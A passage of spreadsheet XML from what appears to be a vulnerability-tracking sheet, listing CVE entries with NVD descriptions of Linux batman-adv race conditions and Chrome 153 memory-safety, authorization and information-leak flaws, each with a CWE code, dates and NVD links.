      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93203</t>
        </is>
      </c>
      <c r="D1020" s="5" t="inlineStr"/>
      <c r="E1020" s="5" t="inlineStr"/>
      <c r="F1020" s="5" t="inlineStr"/>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="inlineStr"/>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr"/>
      <c r="L1020" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1020" s="5" t="inlineStr"/>
      <c r="R1020" s="5" t="inlineStr"/>
      <c r="S1020" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: bla: avoid CRC corruption due to parallel claim add
batadv_bla_add_claim() is used to add claims and modify the backbone of
claims for CLAIM frames from remote backbones and local packets. When it
handles a claim, it needs to either
* add the new claim's CRC to the backbone CRC
* remove the already existing claim's CRC from the old backbone and add it
  to the new backbone
But when the "new" claim code was running in parallel to the "change
backbone" code, it can happen that the CRC was invalid because the
backbone_gw of the claim was changed twice in the "new" claim code path:
* CPU0 creates the claim for gateway A and publishes it in the claim
  hash. The crc16 of the address has not yet been added to A's crc at
  this point.
* CPU1 processes a claim frame of gateway B for the same client, finds
  the just published claim, and performs the ownership change: it
  switches the pointer to B, removes the crc16 from A's crc - which
  never contained it - and adds it to B's crc.
* CPU0 continues behind the creation branch, unconditionally switches
  the pointer back to A without compensating B's crc (its remove_crc
  is false for the creation path), and finally adds the crc16 to A's
  crc
The CRC is then wrong for both:
* claim belongs to A: but CRC is not part of backbone A's CRC
* claim doesn't belong to B: CRC is still part of backbone B's CRC
This wrong CRC is never recomputated from the stored claims. For local
backbone claims, this can also not recovered using syncs.
To avoid this, split the functionality in clear separate parts:
* new claim which always adds claim CRC to the backbone CRC (but never
  changes the already set backbone_gw of the claim back)
* update of existing claim which automatically changes the backbone_gw
  entry and only updates both backbone CRCs when there was an actual change</t>
        </is>
      </c>
      <c r="T1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93203</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93204</t>
        </is>
      </c>
      <c r="D1021" s="5" t="inlineStr"/>
      <c r="E1021" s="5" t="inlineStr"/>
      <c r="F1021" s="5" t="inlineStr"/>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="inlineStr"/>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr"/>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1021" s="5" t="inlineStr"/>
      <c r="R1021" s="5" t="inlineStr"/>
      <c r="S1021" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: dat: atomically update mac addresses
When a MAC address is updated in batadv_dat_entry_add(), it is done using a
simple copy function. A parallel reader might only see parts of this
update. In worst case, the reader is transporting the half updated MAC
address over the network or is creating an ARP response using it -
poisoning the ARP cache.
atomic64_t can be used to store the 48 bit of a mac address. A reader will
then either see the old mac address or the new one - never a mixture of
both.</t>
        </is>
      </c>
      <c r="T1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93204</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93372</t>
        </is>
      </c>
      <c r="D1022" s="5" t="inlineStr"/>
      <c r="E1022" s="5" t="inlineStr"/>
      <c r="F1022" s="5" t="inlineStr"/>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="inlineStr"/>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr"/>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1022" s="5" t="inlineStr"/>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S1022" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebGL in Google Chrome on on Android prior to 153.0.8010.52 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="T1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93372</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93373</t>
        </is>
      </c>
      <c r="D1023" s="5" t="inlineStr"/>
      <c r="E1023" s="5" t="inlineStr"/>
      <c r="F1023" s="5" t="inlineStr"/>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="inlineStr"/>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr"/>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1023" s="5" t="inlineStr"/>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1023" s="5" t="inlineStr">
        <is>
          <t>Use after free in Extensions in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted Chrome extension. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93373</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93374</t>
        </is>
      </c>
      <c r="D1024" s="5" t="inlineStr"/>
      <c r="E1024" s="5" t="inlineStr"/>
      <c r="F1024" s="5" t="inlineStr"/>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="inlineStr"/>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr"/>
      <c r="L1024" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1024" s="5" t="inlineStr"/>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1024" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 153.0.8010.52 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="T1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93374</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93375</t>
        </is>
      </c>
      <c r="D1025" s="5" t="inlineStr"/>
      <c r="E1025" s="5" t="inlineStr"/>
      <c r="F1025" s="5" t="inlineStr"/>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="inlineStr"/>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr"/>
      <c r="K1025" s="5" t="inlineStr"/>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1025" s="5" t="inlineStr"/>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S1025" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Tracing in Google Chrome on on Windows prior to 153.0.8010.52 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93375</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93376</t>
        </is>
      </c>
      <c r="D1026" s="5" t="inlineStr"/>
      <c r="E1026" s="5" t="inlineStr"/>
      <c r="F1026" s="5" t="inlineStr"/>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="inlineStr"/>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr"/>
      <c r="K1026" s="5" t="inlineStr"/>
      <c r="L1026" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1026" s="5" t="inlineStr"/>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S1026" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in DataTransfer in Google Chrome prior to 153.0.8010.52 allowed a local attacker leveraging social engineering to read memory outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93376</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93377</t>
        </is>
      </c>
      <c r="D1027" s="5" t="inlineStr"/>
      <c r="E1027" s="5" t="inlineStr"/>
      <c r="F1027" s="5" t="inlineStr"/>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="inlineStr"/>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr"/>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1027" s="5" t="inlineStr"/>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S1027" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93377</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93378</t>
        </is>
      </c>
      <c r="D1028" s="5" t="inlineStr"/>
      <c r="E1028" s="5" t="inlineStr"/>
      <c r="F1028" s="5" t="inlineStr"/>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="inlineStr"/>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr"/>
      <c r="L1028" s="5" t="inlineStr"/>
      <c r="M1028" s="5" t="inlineStr"/>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1028" s="5" t="inlineStr"/>
      <c r="R1028" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S1028" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Storage in Google Chrome prior to 153.0.8010.52 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted PDF file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93378</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93379</t>
        </is>
      </c>
      <c r="D1029" s="5" t="inlineStr"/>
      <c r="E1029" s="5" t="inlineStr"/>
      <c r="F1029" s="5" t="inlineStr"/>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="inlineStr"/>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr"/>
      <c r="L1029" s="5" t="inlineStr"/>
      <c r="M1029" s="5" t="inlineStr"/>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1029" s="5" t="inlineStr"/>
      <c r="R1029" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S1029" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ORB in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93379</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93380</t>
        </is>
      </c>
      <c r="D1030" s="5" t="inlineStr"/>
      <c r="E1030" s="5" t="inlineStr"/>
      <c r="F1030" s="5" t="inlineStr"/>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="inlineStr"/>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr"/>
      <c r="L1030" s="5" t="inlineStr"/>
      <c r="M1030" s="5" t="inlineStr"/>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1030" s="5" t="inlineStr"/>
      <c r="R1030" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S1030" s="5" t="inlineStr">
        <is>
          <t>Race condition in FileSystem in Google Chrome prior to 153.0.8010.52 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93380</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93381</t>
        </is>
      </c>
      <c r="D1031" s="5" t="inlineStr"/>
      <c r="E1031" s="5" t="inlineStr"/>
      <c r="F1031" s="5" t="inlineStr"/>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="inlineStr"/>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr"/>
      <c r="K1031" s="5" t="inlineStr"/>
      <c r="L1031" s="5" t="inlineStr"/>
      <c r="M1031" s="5" t="inlineStr"/>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1031" s="5" t="inlineStr"/>
      <c r="R1031" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S1031" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in PDFium in Google Chrome on on Windows prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93381</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93382</t>
        </is>
      </c>
      <c r="D1032" s="5" t="inlineStr"/>
      <c r="E1032" s="5" t="inlineStr"/>
      <c r="F1032" s="5" t="inlineStr"/>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="inlineStr"/>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr"/>
      <c r="M1032" s="5" t="inlineStr"/>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1032" s="5" t="inlineStr"/>
      <c r="R1032" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1032" s="5" t="inlineStr">
        <is>
          <t>Use after free in PDFium in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93382</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93383</t>
        </is>
      </c>
      <c r="D1033" s="5" t="inlineStr"/>
      <c r="E1033" s="5" t="inlineStr"/>
      <c r="F1033" s="5" t="inlineStr"/>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="inlineStr"/>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr"/>
      <c r="L1033" s="5" t="inlineStr"/>
      <c r="M1033" s="5" t="inlineStr"/>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1033" s="5" t="inlineStr"/>
      <c r="R1033" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S1033" s="5" t="inlineStr">
        <is>
          <t>Information leak in Permissions in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93383</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93384</t>
        </is>
      </c>
      <c r="D1034" s="5" t="inlineStr"/>
      <c r="E1034" s="5" t="inlineStr"/>
      <c r="F1034" s="5" t="inlineStr"/>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="inlineStr"/>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr"/>
      <c r="L1034" s="5" t="inlineStr"/>
      <c r="M1034" s="5" t="inlineStr"/>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1034" s="5" t="inlineStr"/>
      <c r="R1034" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S1034" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery in Omnibox in Google Chrome on on Android prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93384</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93385</t>
        </is>
      </c>
      <c r="D1035" s="5" t="inlineStr"/>
      <c r="E1035" s="5" t="inlineStr"/>
      <c r="F1035" s="5" t="inlineStr"/>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="inlineStr"/>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr"/>
      <c r="L1035" s="5" t="inlineStr"/>
      <c r="M1035" s="5" t="inlineStr"/>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1035" s="5" t="inlineStr"/>
      <c r="R1035" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S1035" s="5" t="inlineStr">
        <is>
          <t>Information leak in Paint in Google Chrome prior to 153.0.8010.52 allowed a remote attacker to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93385</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93386</t>
        </is>
      </c>
      <c r="D1036" s="5" t="inlineStr"/>
      <c r="E1036" s="5" t="inlineStr"/>
      <c r="F1036" s="5" t="inlineStr"/>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="inlineStr"/>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr"/>
      <c r="M1036" s="5" t="inlineStr"/>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1036" s="5" t="inlineStr"/>
      <c r="R1036" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S1036" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in WebAppInstalls in Google Chrome prior to 153.0.8010.52 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93386</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93387</t>
        </is>
      </c>
      <c r="D1037" s="5" t="inlineStr"/>
      <c r="E1037" s="5" t="inlineStr"/>
      <c r="F1037" s="5" t="inlineStr"/>
